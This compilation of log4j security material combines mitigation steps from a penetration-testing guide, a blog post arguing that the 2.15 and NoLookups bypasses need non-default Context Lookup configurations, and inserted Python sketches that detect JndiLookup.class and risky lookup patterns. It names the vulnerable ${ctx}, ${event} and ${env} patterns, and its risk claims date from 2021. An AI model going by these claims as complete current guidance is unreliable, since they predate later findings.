- In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
- Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application, such as HTTP headers or user input.

To read more about mitigation, you can access the following link: https://logging.apache.org/log4j/2.x/security.html

Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. He can be contacted on LinkedIn.

Source: https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/
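As a quick way to double-check the JndiLookup-removal mitigation from the article above, here is an illustrative Python sketch (the helper names are my own) that inspects a jar for the class that `zip -q -d` strips out; the demo builds two tiny in-memory stand-in jars rather than touching a real log4j-core artifact.

```python
# Sketch: check whether a log4j-core jar still contains JndiLookup.class,
# i.e. whether the "zip -q -d" mitigation has been applied.
import io
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jar_contains_jndi_lookup(jar_bytes: bytes) -> bool:
    """Return True if the jar still ships the JndiLookup class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return JNDI_CLASS in jar.namelist()

def make_stub_jar(names):
    """Build a minimal in-memory zip standing in for a jar (demo only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name in names:
            jar.writestr(name, b"")
    return buf.getvalue()

vulnerable = make_stub_jar(["META-INF/MANIFEST.MF", JNDI_CLASS])
mitigated = make_stub_jar(["META-INF/MANIFEST.MF"])
print(jar_contains_jndi_lookup(vulnerable))  # True
print(jar_contains_jndi_lookup(mitigated))   # False
```

In practice you would pass the bytes of the real log4j-core jar found on the classpath; remember this check says nothing about upgraded versions, only about the class-removal workaround.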
The Subsequent Waves of log4j Vulnerabilities Aren't as Bad as People Think

Attacks against 2.15 and the CLI fix require a non-standard logging config

By DANIEL MIESSLER in INFORMATION SECURITY CREATED/UPDATED: DECEMBER 18, 2021

If you're reading this, you're underslept and over-caffeinated due to log4j. Thank you for your service. I have some good news. I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know. Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable! Read that again.

The bypasses of 2.15 and the NoLookups CLI change don't affect people unless they have non-default logging configurations. From the Apache advisory:

"It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern." — Apache project security advisory

"Certain non-default configurations". I've never heard a sweeter set of syllables. These can also be set in log4j2.xml or programmatically. So you need to have changed your configs to include patterns like:

$${ctx:loginId}
${ctx
${event
${env

…etc., to be vulnerable to a bypass of the 2.15 patch level or of the log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS=true mitigation! That's huge! And Nate figured this out like 4 days ago!
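The risky patterns listed above lend themselves to a quick automated check. Here is an illustrative Python sketch (a string-level heuristic I wrote for this point, not a real log4j config parser) that flags a PatternLayout or properties snippet containing those lookups:

```python
# Sketch: flag logging configs containing the non-default Context/Event/
# Environment Lookup patterns described above. String-level heuristic only;
# it does not parse log4j configuration semantics.
import re

# Matches ${ctx...}, $${ctx...}, ${event..., ${env... style lookups.
RISKY_LOOKUP = re.compile(r"\$\$?\{(ctx|event|env)[:}]")

def has_risky_lookup(config_text: str) -> bool:
    """Return True if the config text contains one of the risky lookups."""
    return bool(RISKY_LOOKUP.search(config_text))

default_layout = "%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"
custom_layout = "%d %p %c - loginId=$${ctx:loginId} %m%n"
print(has_risky_lookup(default_layout))  # False
print(has_risky_lookup(custom_layout))   # True
```

A hit doesn't prove exploitability, but it tells you that the 2.15/NoLookups mitigations alone may not be enough for that config.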
He mentioned to me multiple times this wasn't as bad as people thought, but he wasn't shouting it from the rooftops, so I didn't listen well enough. Shame on me. He also happens to have a strong meme game.

Summary

The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration. But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them. So, if you're already patched to 2.15 and/or have the mitigation in place, and don't have non-standard configs—which you should confirm—you might be able to sleep for a bit. And of course, keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast. Finally, d0nut is awesome and you should follow his work.

Notes

- This also applies to the DoS that 2.17 addresses.
- Thanks to Nate for the great find!

Written By Daniel Miessler

Daniel Miessler is a cybersecurity leader, writer, and founder of Unsupervised Learning. He writes about security, tech, and society and has been featured in the New York Times, WSJ, and the BBC.

Source: https://danielmiessler.com/blog/the-second-wave-of-log4j-vulnerabilities-werent-nearly-as-bad-as-people-think/